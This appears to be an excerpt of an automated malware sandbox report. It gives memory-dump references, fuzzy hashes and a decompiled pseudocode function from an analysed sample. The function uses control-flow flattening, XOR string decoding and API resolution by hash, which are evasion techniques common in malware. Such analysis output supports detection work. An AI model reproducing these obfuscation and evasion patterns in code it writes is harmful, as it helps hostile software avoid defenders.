                                                                                                                                                        • Instruction ID: 30d9c37b22165684ac065a26b413e35f71b156ab455f41abd8d064945daadd14
                                                                                                                                                        • Opcode Fuzzy Hash: ec541e7174414d4e89c205959fd04962df5884824a857730078020915900380e
                                                                                                                                                        • Instruction Fuzzy Hash: 55716A7233838546DB248B5EF85172EBA90F385794F64411AFF8ADBB58CE7DC4828B01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A204C, Relevance: 7.3, Strings: 4, Instructions: 2300COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 2-X$TI>$\?D2$K#
                                                                                                                                                        • API String ID: 0-476746423
                                                                                                                                                        • Opcode ID: 07016204a52e34d5b66bb0e2d657dbe33012cf5c13e8e6da5de7c3e74eaf3d83
                                                                                                                                                        • Instruction ID: 5457e14067a3d14633da0d872124e5ba6333e6fc8e698a4aae9d0e785ae17da7
                                                                                                                                                        • Opcode Fuzzy Hash: 07016204a52e34d5b66bb0e2d657dbe33012cf5c13e8e6da5de7c3e74eaf3d83
                                                                                                                                                        • Instruction Fuzzy Hash: 33037963B38B9447D3198E7E9C54229BAA2F784794F459239EF9AC3BD4E93CDC018740
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D2B26, Relevance: 7.0, Strings: 5, Instructions: 708COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E012D2B26(void* __rcx, void* __r11) {
				signed long long _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				void* _v208;
				void* _v216;
				void* _v224;
				signed long long _v232;
				long long _v240;
				signed long long _v248;
				signed long long _v256;
				char _v260;
				signed long long _v272;
				signed long long _v280;
				signed long long _v288;
				signed long long _v296;
				void* _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed long long _v336;
				signed long long _v340;
				signed long long _v352;
				signed long long _v360;
				signed int _v364;
				signed long long _v376;
				char _v377;
				signed int _v392;
				signed int _v400;
				signed int _v408;
				intOrPtr _t186;
				void* _t235;
				void* _t334;
				signed int _t360;
				signed int _t365;
				signed int _t371;
				intOrPtr* _t385;
				signed long long _t386;
				signed long long _t387;
				intOrPtr _t402;
				signed long long _t403;
				signed long long _t429;
				signed long long _t434;
				signed long long _t450;
				signed long long* _t453;
				char* _t454;
				void* _t457;
				void* _t459;
				long long _t460;

				_t457 = __r11;
				_t453 =  &_v376;
				asm("movaps [esp+0x160], xmm6");
				_t459 = __rcx;
				_t385 =  &_v364;
				_v240 = _t385;
				_t402 = _v240;
				 *_t385 = 0;
				_t386 =  &_v260;
				_v232 = _t386;
				 *_t386 = 0;
				_t429 =  &_v196;
				 *((char*)(_t429 - 4)) = 0;
				 *_t429 = 0x3298e3bf;
				 *((intOrPtr*)(_t429 + 4)) = 0x329ee388;
				 *((intOrPtr*)(_t429 + 8)) = 0x329be39e;
				 *((intOrPtr*)(_t429 + 0xc)) = 0x32d8e393;
				 *((intOrPtr*)(_t429 + 0x10)) = 0x32d9e3c7;
				 *((intOrPtr*)(_t429 + 0x14)) = 0x32f7e3c2;
				if( *((intOrPtr*)(_t429 - 4)) != 0) {
					L3:
					r8d = 0xb8e4c1c3;
					r9d = 0x1fc;
					E012DFAD7(9, _t365, _t386, _t402);
					_v408 = 0;
					_t403 = _t429;
					r8d = 0;
					r9d = 0;
					 *_t386();
					_v360 = _t386;
					_t387 = _t459 + 0x948;
					_v96 = _t387;
					_t460 = _t459 + 0x28;
					_t186 = 0x44a5d44e;
					asm("xorps xmm6, xmm6");
					r15d = 0x53c0410f;
					_v280 = _t403;
					_v288 = _t403;
					_v272 = _t403;
					L4:
					while(1) {
						L4:
						while(1) {
							while(_t186 <= 0xbe80c7e) {
								if(_t186 > 0xbdd1dead) {
									if(_t186 > 0xecb2b9e3) {
										if(_t186 <= 0xf69479ae) {
											if(_t186 == 0xecb2b9e4) {
												_v340 = _v320;
												_t186 =  <  ? 0x123f0a19 : 0x682ebb3d;
											} else {
												if(_t186 == 0xef8fa129) {
													_t403 = _v376;
													E012D292B(_t346, _t371, _t403, _t459, _t454);
													_t186 =  !=  ? 0x668e8b62 : 0x40b6f774;
													_v256 = _t403;
													_v324 = 0;
												}
											}
										} else {
											if(_t186 == 0xf69479af) {
												_v304 = _t460;
												r14d =  *(_v304 + 0x7d8) & 0x0000ffff;
												_t387 = _v304;
												_t346 = 9;
												r8d = 0x886d3f59;
												r9d = 0x1fd;
												E012DFAD7(9, _t365, _t387, _t403);
												_t403 = _v360;
												r15d = 0x53c0410f;
												r8d = r14d;
												r9d = 0;
												 *_t387();
												_v352 = _t387;
												_t186 =  ==  ? 0x30dc5f9d : 0xdeab7e12;
											} else {
												if(_t186 == 0x1ba8c2b) {
													r8d = 0x570a1023;
													r9d = 0x200;
													E012DFAD7(9, _t365, _t387, _t403);
													_t403 = _v376;
													_t346 = 0;
													 *_t387();
													_t186 =  ==  ? r15d : 0xef8fa129;
												} else {
													if(_t186 == 0x73ef28e) {
														_v320 = _v340 + 1;
														_t186 = 0xecb2b9e4;
													}
												}
											}
										}
										continue;
									}
									if(_t186 <= 0xdeab7e11) {
										if(_t186 == 0xbdd1deae) {
											_v272 = _t387;
											_t346 = 1;
											r8d = 0xce1f1c4e;
											r9d = 0xc5;
											E012DFAD7(1, _t365, _t387, _t403);
											 *_t387();
											_t186 =  ==  ? 0x3e55440d : 0xa41908ba;
										} else {
											if(_t186 == 0xd6faa5c9) {
												_t186 =  ==  ? 0x4d59c146 : 0x17ab78fb;
												_t371 = 0;
											}
										}
										continue;
									}
									if(_t186 == 0xdeab7e12) {
										_v224 = _v304 + _t403;
										_t387 = _v224;
										_t365 = ( *_t387 & 0x000000ff) << 0x00000017 | 0x00000100;
										_t346 = 9;
										r8d = 0xdcbc517e;
										r9d = 0x1fe;
										E012DFAD7(9, _t365, _t387, _t403);
										_v392 = _t365;
										asm("movups [esp+0x20], xmm6");
										_t403 = _v352;
										_t454 = _v304 + 8;
										r9d = 0;
										 *_t387();
										_v376 = _t387;
										_t186 =  ==  ? 0x8c6e6a36 : 0x8d89953f;
										continue;
									}
									if(_t186 == 0xdfaa0068) {
										E012DCFAA();
										_v336 = _t387;
										r8d = _v364;
										E012DC8BC(0, _t387, _v336, _t454, _t457);
										_t346 = 9;
										r8d = 0x929d4418;
										r9d = 0x203;
										E012DFAD7(9, _t365, _t387, _v336);
										_t403 = _v376;
										r8d = _v364;
										 *_t387();
										_t186 =  ==  ? 0x2417a336 : 0x45232fe6;
										continue;
									}
									if(_t186 == 0xe700ce65) {
										L74:
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t403);
										_t403 = _v376;
										 *_t387();
										_t434 = _v352;
										L75:
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t403);
										 *_t387();
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t434);
										_t403 = _v360;
										L76:
										 *_t387();
										_t186 = 0x17ab78fb;
									}
									continue;
								}
								if(_t186 > 0x925e1529) {
									if(_t186 <= 0xa41908b9) {
										if(_t186 == 0x925e152a) {
											r8d = 0xc7d6eac4;
											r9d = 0x204;
											E012DFAD7(9, _t365, _t387, _t403);
											 *_t387();
											r8d = 0xc7d6eac4;
											r9d = 0x204;
											E012DFAD7(9, _t365, _t387, _v376);
											 *_t387();
											r8d = 0xc7d6eac4;
											r9d = 0x204;
											E012DFAD7(9, _t365, _t387, _v352);
											 *_t387();
											L97:
											_t403 = _v296;
											E012DCF40(_t387, _t403);
											_t186 = 0x17ab78fb;
											continue;
										}
										if(_t186 == 0x99b68537) {
											_v208 = _v248;
											_t387 = _v280;
											_v308 = _t186;
											_t186 =  ==  ? 0x715f5ff9 : 0x668e8b62;
											_v324 = _v308;
											_t403 = _v208;
											_v256 = _t403;
										}
									} else {
										if(_t186 == 0xa41908ba) {
											_t186 = 0x7747b34b;
											_t403 = _v272;
											_v288 = _t403;
										} else {
											if(_t186 == 0xa899b38e) {
												_v200 = 0x3300;
												r8d = 0x8c0732e0;
												r9d = 0x206;
												E012DFAD7(9, _t365, _t387, _t403);
												_t403 = _v376;
												_t346 = 0x1f;
												_t454 =  &_v200;
												r9d = 4;
												 *_t387();
												_t186 = 0x865deeb2;
											} else {
												if(_t186 == 0xbc39b945) {
													_t186 = 0x17ab78fb;
													_t371 = 0;
												}
											}
										}
									}
									continue;
								}
								if(_t186 <= 0x8c6e6a35) {
									if(_t186 == 0x81c50d8e) {
										goto L74;
									}
									if(_t186 == 0x865deeb2) {
										_t186 = 0x1bd6c5f4;
									}
									continue;
								}
								if(_t186 == 0x8c6e6a36) {
									_t434 = _v352;
									_t371 = 0;
									goto L75;
								}
								if(_t186 == 0x8d0b0d40) {
									_v200 = 0;
									_v196 = 0x30f9249d;
									_v192 = 0x30e224b0;
									_v188 = 0x30f824bb;
									_v184 = 0x30bb24aa;
									_v180 = 0x30ef248a;
									_v176 = 0x30f324ae;
									_v172 = 0x30b624e4;
									_v168 = 0x30e624bf;
									_v164 = 0x30fa24ae;
									_v160 = 0x30f524b7;
									_v156 = 0x30e224bf;
									_v152 = 0x30f924b7;
									_v148 = 0x30b924b0;
									_v144 = 0x30bb24a6;
									_v140 = 0x30e124a9;
									_v136 = 0x30bb24a9;
									_v132 = 0x30f924b8;
									_v128 = 0x30fb24ac;
									_v124 = 0x30e324f3;
									_v120 = 0x30fa24ac;
									_v116 = 0x30f824bb;
									_v112 = 0x30f924bd;
									_v108 = 0x30f324ba;
									_v104 = 0x309624ba;
									if(_v200 != 0) {
										L81:
										_t346 = 9;
										r8d = 0x91a4e846;
										r9d = 0x205;
										E012DFAD7(9, _t365, _t387, _t403);
										_t403 = _v376;
										r8d = 0xffffffff;
										r9d = 0x20000000;
										 *_t387();
										_t186 =  ==  ? 0x81c50d8e : 0x3cc37726;
										continue;
									}
									do {
										 *(_t453 + 0xf0 + _t387 * 4) =  *(_t453 + 0xf0 + _t387 * 4) & 0xcf69db21 |  !( *(_t453 + 0xf0 + _t387 * 4)) & 0x309624de;
										_t403 = _t403 + 1;
										_t387 = _t387 + 1;
									} while (_t387 != 0x19);
									goto L81;
								} else {
									if(_t186 == 0x8d89953f) {
										_t186 = 0xecb2b9e4;
										_v320 = 0;
									}
									continue;
								}
							}
							if(_t186 <= 0x40b6f773) {
								if(_t186 <= 0x2417a335) {
									if(_t186 <= 0x17ab78fa) {
										if(_t186 == 0xbe80c7f) {
											_v316 = _v364;
											_t186 =  ==  ? 0x99b68537 : 0xdfaa0068;
											_v280 = _t403;
											_t403 = _v296;
											_v248 = _t403;
										} else {
											if(_t186 == 0x123f0a19) {
												_t387 = _v340;
												_t346 = 9;
												r8d = 0x91a4e846;
												r9d = 0x205;
												E012DFAD7(9, _t365, _t387, _t403);
												_t403 = _v376;
												r8d = 0xffffffff;
												r9d = 0x20000000;
												 *_t387();
												_t186 =  ==  ? 0x26985563 : 0x73ef28e;
											}
										}
										continue;
									}
									if(_t186 == 0x17ab78fb) {
										bpl = bpl & 0x00000001;
										asm("movaps xmm6, [esp+0x160]");
										return _t371;
									}
									if(_t186 == 0x1bd6c5f4) {
										_t387 = _v216;
										_t365 =  *_t387;
										_v288 = _t387;
										r8d = 0x47885070;
										r9d = 0x1ff;
										E012DFAD7(9, _t365, _t387, _t403);
										_v400 = _t365;
										_v408 = _t365;
										_v392 = 0;
										_t403 = _v376;
										_t346 = 0;
										r8d = 0;
										_v377 =  *_t387() != 0;
										_t186 =  !=  ? 0x7747b34b : 0xbdd1deae;
									}
									continue;
								}
								if(_t186 <= 0x30dc5f9c) {
									if(_t186 == 0x2417a336) {
										_t371 = 0;
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t403);
										 *_t387();
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v376);
										 *_t387();
										_t450 = _v360;
										_t346 = 9;
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v352);
										 *_t387();
										E012DCF40(_t387, _v336);
										goto L97;
									}
									if(_t186 == 0x26985563) {
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t403);
										 *_t387();
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v376);
										 *_t387();
										_t346 = 9;
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v352);
										_t403 = _v360;
										 *_t387();
										_t186 = 0xd6faa5c9;
										_v328 = 1;
									}
									continue;
								}
								if(_t186 == 0x30dc5f9d) {
									_t371 = 0;
									_t346 = 9;
									r8d = 0xc7d6eac4;
									r9d = 0x204;
									E012DFAD7(9, _t365, _t387, _t403);
									_t403 = _v360;
									goto L76;
								} else {
									if(_t186 == 0x3cc37726) {
										_t387 = _v224;
										_t186 =  ==  ? 0x865deeb2 : 0xa899b38e;
									} else {
										if(_t186 == 0x3e55440d) {
											_t186 = 0xa41908ba;
											_v272 = _t403;
										}
									}
									continue;
								}
							}
							if(_t186 > 0x668e8b61) {
								if(_t186 <= 0x715f5ff8) {
									if(_t186 == 0x668e8b62) {
										_t387 = _v256;
										_v296 = _t387;
										_v312 = _v324;
										_v364 = 0;
										_t346 = 9;
										r8d = 0xc55e9629;
										r9d = 0x202;
										E012DFAD7(9, _t365, _t387, _t403);
										_t403 = _v376;
										 *_t387();
										_t186 =  ==  ? 0x925e152a : 0xbe80c7f;
									} else {
										if(_t186 == 0x682ebb3d) {
											_t186 = 0xd6faa5c9;
											_v328 = 2;
										}
									}
								} else {
									if(_t186 == 0x715f5ff9) {
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _t403);
										 *_t387();
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v376);
										 *_t387();
										_t450 = _v360;
										_t346 = 9;
										r8d = 0xc7d6eac4;
										r9d = 0x204;
										E012DFAD7(9, _t365, _t387, _v352);
										_t403 = _t450;
										 *_t387();
										_t387 = _v208;
										 *(_t459 + 0x938) = _t387;
										 *((intOrPtr*)(_t459 + 0x934)) = _v308;
										_t186 = 0x17ab78fb;
										bpl = 1;
									} else {
										if(_t186 == 0x73761319) {
											_t186 =  !=  ? 0x1ba8c2b : 0xe700ce65;
										} else {
											if(_t186 == 0x7747b34b) {
												_t387 = _v288;
												_t334 = 0x73761319;
												_t186 =  ==  ? 0x73761319 : 0x1bd6c5f4;
											}
										}
									}
								}
								continue;
							}
							if(_t186 <= 0x45232fe5) {
								if(_t186 == 0x40b6f774) {
									goto L74;
								}
								if(_t186 == 0x44a5d44e) {
									_t334 = 0xbc39b945;
									_t186 =  ==  ? 0xbc39b945 : 0xf69479af;
								}
								continue;
							}
							if(_t186 == 0x45232fe6) {
								_t365 = _v312 + _v364;
								_t235 = E012DCFE3(_t334, _t346, _t365, _t387, _v296, _t450);
								r8d = _v364;
								_v280 = _t450;
								_t334 = _t365 - r8d;
								_v248 = _t387;
								E012DC96E(_t235, _v296 + _t387, _v336);
								_t403 = _v336;
								E012DCF40(_t387, _t403);
								_t186 = 0x99b68537;
								continue;
							}
							if(_t186 == 0x4d59c146) {
								_v216 = _v96;
								_t387 = _v216;
								_t334 = 0x3cc37726;
								_t186 =  ==  ? 0x3cc37726 : 0x8d0b0d40;
								continue;
							}
							if(_t186 != 0x53c0410f) {
								continue;
							} else {
								goto L74;
							}
						}
					}
				} else {
					do {
						_t360 =  *(_t453 + 0xf0 + _t386 * 4);
						_t371 =  !_t360 & 0x9b193212;
						 *(_t453 + 0xf0 + _t386 * 4) = (_t360 & 0x64e6cded | _t371) ^ 0xa9eed1e0;
						_t402 = _t402 + 1;
						_t386 = _t386 + 1;
					} while (_t386 != 7);
					goto L3;
				}
			}













































































                                                                                                                                                        0x012d2b26
                                                                                                                                                        0x012d2b32
                                                                                                                                                        0x012d2b39
                                                                                                                                                        0x012d2b41
                                                                                                                                                        0x012d2b44
                                                                                                                                                        0x012d2b49
                                                                                                                                                        0x012d2b51
                                                                                                                                                        0x012d2b5b
                                                                                                                                                        0x012d2b5d
                                                                                                                                                        0x012d2b65
                                                                                                                                                        0x012d2b75
                                                                                                                                                        0x012d2b77
                                                                                                                                                        0x012d2b7f
                                                                                                                                                        0x012d2b82
                                                                                                                                                        0x012d2b88
                                                                                                                                                        0x012d2b8f
                                                                                                                                                        0x012d2b96
                                                                                                                                                        0x012d2b9d
                                                                                                                                                        0x012d2ba4
                                                                                                                                                        0x012d2bae
                                                                                                                                                        0x012d2be9
                                                                                                                                                        0x012d2bf0
                                                                                                                                                        0x012d2bf6
                                                                                                                                                        0x012d2bfc
                                                                                                                                                        0x012d2c01
                                                                                                                                                        0x012d2c09
                                                                                                                                                        0x012d2c0e
                                                                                                                                                        0x012d2c11
                                                                                                                                                        0x012d2c14
                                                                                                                                                        0x012d2c16
                                                                                                                                                        0x012d2c1b
                                                                                                                                                        0x012d2c22
                                                                                                                                                        0x012d2c2a
                                                                                                                                                        0x012d2c2e
                                                                                                                                                        0x012d2c33
                                                                                                                                                        0x012d2c36
                                                                                                                                                        0x012d2c3c
                                                                                                                                                        0x012d2c44
                                                                                                                                                        0x012d2c4c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2c54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2c54
                                                                                                                                                        0x012d2c54
                                                                                                                                                        0x012d2c60
                                                                                                                                                        0x012d2cf0
                                                                                                                                                        0x012d2dfd
                                                                                                                                                        0x012d306c
                                                                                                                                                        0x012d382c
                                                                                                                                                        0x012d3845
                                                                                                                                                        0x012d3072
                                                                                                                                                        0x012d3077
                                                                                                                                                        0x012d307d
                                                                                                                                                        0x012d3085
                                                                                                                                                        0x012d3096
                                                                                                                                                        0x012d309b
                                                                                                                                                        0x012d30a3
                                                                                                                                                        0x012d30a3
                                                                                                                                                        0x012d3077
                                                                                                                                                        0x012d2e03
                                                                                                                                                        0x012d2e08
                                                                                                                                                        0x012d35f0
                                                                                                                                                        0x012d3603
                                                                                                                                                        0x012d360b
                                                                                                                                                        0x012d361d
                                                                                                                                                        0x012d3622
                                                                                                                                                        0x012d3628
                                                                                                                                                        0x012d362e
                                                                                                                                                        0x012d3633
                                                                                                                                                        0x012d3639
                                                                                                                                                        0x012d363f
                                                                                                                                                        0x012d3645
                                                                                                                                                        0x012d3648
                                                                                                                                                        0x012d364a
                                                                                                                                                        0x012d365f
                                                                                                                                                        0x012d2e0e
                                                                                                                                                        0x012d2e13
                                                                                                                                                        0x012d3673
                                                                                                                                                        0x012d3679
                                                                                                                                                        0x012d367f
                                                                                                                                                        0x012d3684
                                                                                                                                                        0x012d3687
                                                                                                                                                        0x012d3689
                                                                                                                                                        0x012d3692
                                                                                                                                                        0x012d2e19
                                                                                                                                                        0x012d2e1e
                                                                                                                                                        0x012d2e2a
                                                                                                                                                        0x012d2e2e
                                                                                                                                                        0x012d2e2e
                                                                                                                                                        0x012d2e1e
                                                                                                                                                        0x012d2e13
                                                                                                                                                        0x012d2e08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2dfd
                                                                                                                                                        0x012d2cfb
                                                                                                                                                        0x012d2f20
                                                                                                                                                        0x012d369d
                                                                                                                                                        0x012d36a7
                                                                                                                                                        0x012d36ac
                                                                                                                                                        0x012d36b2
                                                                                                                                                        0x012d36b8
                                                                                                                                                        0x012d36bd
                                                                                                                                                        0x012d36ce
                                                                                                                                                        0x012d2f26
                                                                                                                                                        0x012d2f2b
                                                                                                                                                        0x012d2f40
                                                                                                                                                        0x012d2f43
                                                                                                                                                        0x012d2f43
                                                                                                                                                        0x012d2f2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2f20
                                                                                                                                                        0x012d2d06
                                                                                                                                                        0x012d33ba
                                                                                                                                                        0x012d33c2
                                                                                                                                                        0x012d33d0
                                                                                                                                                        0x012d33e9
                                                                                                                                                        0x012d33ee
                                                                                                                                                        0x012d33f4
                                                                                                                                                        0x012d33fa
                                                                                                                                                        0x012d33ff
                                                                                                                                                        0x012d3403
                                                                                                                                                        0x012d3408
                                                                                                                                                        0x012d340e
                                                                                                                                                        0x012d3411
                                                                                                                                                        0x012d3414
                                                                                                                                                        0x012d3416
                                                                                                                                                        0x012d342c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d342c
                                                                                                                                                        0x012d2d11
                                                                                                                                                        0x012d3438
                                                                                                                                                        0x012d343d
                                                                                                                                                        0x012d3442
                                                                                                                                                        0x012d344e
                                                                                                                                                        0x012d3463
                                                                                                                                                        0x012d3468
                                                                                                                                                        0x012d346e
                                                                                                                                                        0x012d3474
                                                                                                                                                        0x012d3479
                                                                                                                                                        0x012d347f
                                                                                                                                                        0x012d348a
                                                                                                                                                        0x012d3499
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3499
                                                                                                                                                        0x012d2d1c
                                                                                                                                                        0x012d3118
                                                                                                                                                        0x012d3126
                                                                                                                                                        0x012d312c
                                                                                                                                                        0x012d3132
                                                                                                                                                        0x012d3137
                                                                                                                                                        0x012d313a
                                                                                                                                                        0x012d313c
                                                                                                                                                        0x012d3141
                                                                                                                                                        0x012d3148
                                                                                                                                                        0x012d314e
                                                                                                                                                        0x012d3154
                                                                                                                                                        0x012d315c
                                                                                                                                                        0x012d316a
                                                                                                                                                        0x012d3170
                                                                                                                                                        0x012d3176
                                                                                                                                                        0x012d317b
                                                                                                                                                        0x012d317e
                                                                                                                                                        0x012d317e
                                                                                                                                                        0x012d3180
                                                                                                                                                        0x012d3180
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2d1c
                                                                                                                                                        0x012d2c6b
                                                                                                                                                        0x012d2d77
                                                                                                                                                        0x012d2fdd
                                                                                                                                                        0x012d3758
                                                                                                                                                        0x012d375e
                                                                                                                                                        0x012d3764
                                                                                                                                                        0x012d376c
                                                                                                                                                        0x012d377a
                                                                                                                                                        0x012d3780
                                                                                                                                                        0x012d3786
                                                                                                                                                        0x012d378e
                                                                                                                                                        0x012d379c
                                                                                                                                                        0x012d37a2
                                                                                                                                                        0x012d37a8
                                                                                                                                                        0x012d37b0
                                                                                                                                                        0x012d37b2
                                                                                                                                                        0x012d37b2
                                                                                                                                                        0x012d37ba
                                                                                                                                                        0x012d37bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d37bf
                                                                                                                                                        0x012d2fe8
                                                                                                                                                        0x012d2ff6
                                                                                                                                                        0x012d2ffe
                                                                                                                                                        0x012d3006
                                                                                                                                                        0x012d301c
                                                                                                                                                        0x012d3026
                                                                                                                                                        0x012d302a
                                                                                                                                                        0x012d3032
                                                                                                                                                        0x012d3032
                                                                                                                                                        0x012d2d7d
                                                                                                                                                        0x012d2d82
                                                                                                                                                        0x012d34e5
                                                                                                                                                        0x012d34ea
                                                                                                                                                        0x012d34f2
                                                                                                                                                        0x012d2d88
                                                                                                                                                        0x012d2d8d
                                                                                                                                                        0x012d34ff
                                                                                                                                                        0x012d3516
                                                                                                                                                        0x012d351c
                                                                                                                                                        0x012d3522
                                                                                                                                                        0x012d3527
                                                                                                                                                        0x012d352a
                                                                                                                                                        0x012d352f
                                                                                                                                                        0x012d3537
                                                                                                                                                        0x012d353d
                                                                                                                                                        0x012d353f
                                                                                                                                                        0x012d2d93
                                                                                                                                                        0x012d2d98
                                                                                                                                                        0x012d2d9e
                                                                                                                                                        0x012d2da3
                                                                                                                                                        0x012d2da3
                                                                                                                                                        0x012d2d98
                                                                                                                                                        0x012d2d8d
                                                                                                                                                        0x012d2d82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2d77
                                                                                                                                                        0x012d2c76
                                                                                                                                                        0x012d2ed2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2edd
                                                                                                                                                        0x012d2ee3
                                                                                                                                                        0x012d2ee3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2edd
                                                                                                                                                        0x012d2c81
                                                                                                                                                        0x012d318a
                                                                                                                                                        0x012d318f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d318f
                                                                                                                                                        0x012d2c8c
                                                                                                                                                        0x012d3195
                                                                                                                                                        0x012d319c
                                                                                                                                                        0x012d31a7
                                                                                                                                                        0x012d31b7
                                                                                                                                                        0x012d31be
                                                                                                                                                        0x012d31c9
                                                                                                                                                        0x012d31d4
                                                                                                                                                        0x012d31df
                                                                                                                                                        0x012d31ea
                                                                                                                                                        0x012d31f5
                                                                                                                                                        0x012d3200
                                                                                                                                                        0x012d320b
                                                                                                                                                        0x012d3216
                                                                                                                                                        0x012d3221
                                                                                                                                                        0x012d322c
                                                                                                                                                        0x012d3237
                                                                                                                                                        0x012d3242
                                                                                                                                                        0x012d324d
                                                                                                                                                        0x012d3258
                                                                                                                                                        0x012d3263
                                                                                                                                                        0x012d326e
                                                                                                                                                        0x012d3279
                                                                                                                                                        0x012d3280
                                                                                                                                                        0x012d328b
                                                                                                                                                        0x012d3296
                                                                                                                                                        0x012d32a8
                                                                                                                                                        0x012d32dd
                                                                                                                                                        0x012d32e4
                                                                                                                                                        0x012d32e9
                                                                                                                                                        0x012d32ef
                                                                                                                                                        0x012d32f5
                                                                                                                                                        0x012d32fa
                                                                                                                                                        0x012d3305
                                                                                                                                                        0x012d330b
                                                                                                                                                        0x012d3311
                                                                                                                                                        0x012d331f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d331f
                                                                                                                                                        0x012d32b1
                                                                                                                                                        0x012d32ca
                                                                                                                                                        0x012d32d1
                                                                                                                                                        0x012d32d4
                                                                                                                                                        0x012d32d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2c92
                                                                                                                                                        0x012d2c97
                                                                                                                                                        0x012d2c99
                                                                                                                                                        0x012d2c9e
                                                                                                                                                        0x012d2c9e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2c97
                                                                                                                                                        0x012d2c8c
                                                                                                                                                        0x012d2cad
                                                                                                                                                        0x012d2d2c
                                                                                                                                                        0x012d2e3d
                                                                                                                                                        0x012d30b5
                                                                                                                                                        0x012d3851
                                                                                                                                                        0x012d3864
                                                                                                                                                        0x012d386e
                                                                                                                                                        0x012d3876
                                                                                                                                                        0x012d387e
                                                                                                                                                        0x012d30bb
                                                                                                                                                        0x012d30c0
                                                                                                                                                        0x012d30c6
                                                                                                                                                        0x012d30da
                                                                                                                                                        0x012d30df
                                                                                                                                                        0x012d30e5
                                                                                                                                                        0x012d30eb
                                                                                                                                                        0x012d30f0
                                                                                                                                                        0x012d30f6
                                                                                                                                                        0x012d30fc
                                                                                                                                                        0x012d3102
                                                                                                                                                        0x012d3110
                                                                                                                                                        0x012d3110
                                                                                                                                                        0x012d30c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d30b5
                                                                                                                                                        0x012d2e48
                                                                                                                                                        0x012d389b
                                                                                                                                                        0x012d38a1
                                                                                                                                                        0x012d38bc
                                                                                                                                                        0x012d38bc
                                                                                                                                                        0x012d2e53
                                                                                                                                                        0x012d2e59
                                                                                                                                                        0x012d2e61
                                                                                                                                                        0x012d2e71
                                                                                                                                                        0x012d2e80
                                                                                                                                                        0x012d2e86
                                                                                                                                                        0x012d2e8c
                                                                                                                                                        0x012d2e91
                                                                                                                                                        0x012d2e95
                                                                                                                                                        0x012d2e99
                                                                                                                                                        0x012d2ea2
                                                                                                                                                        0x012d2ea5
                                                                                                                                                        0x012d2ea7
                                                                                                                                                        0x012d2eb1
                                                                                                                                                        0x012d2ec5
                                                                                                                                                        0x012d2ec5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2e53
                                                                                                                                                        0x012d2d37
                                                                                                                                                        0x012d2f4f
                                                                                                                                                        0x012d36db
                                                                                                                                                        0x012d36e4
                                                                                                                                                        0x012d36ea
                                                                                                                                                        0x012d36f0
                                                                                                                                                        0x012d36f8
                                                                                                                                                        0x012d3706
                                                                                                                                                        0x012d370c
                                                                                                                                                        0x012d3712
                                                                                                                                                        0x012d371a
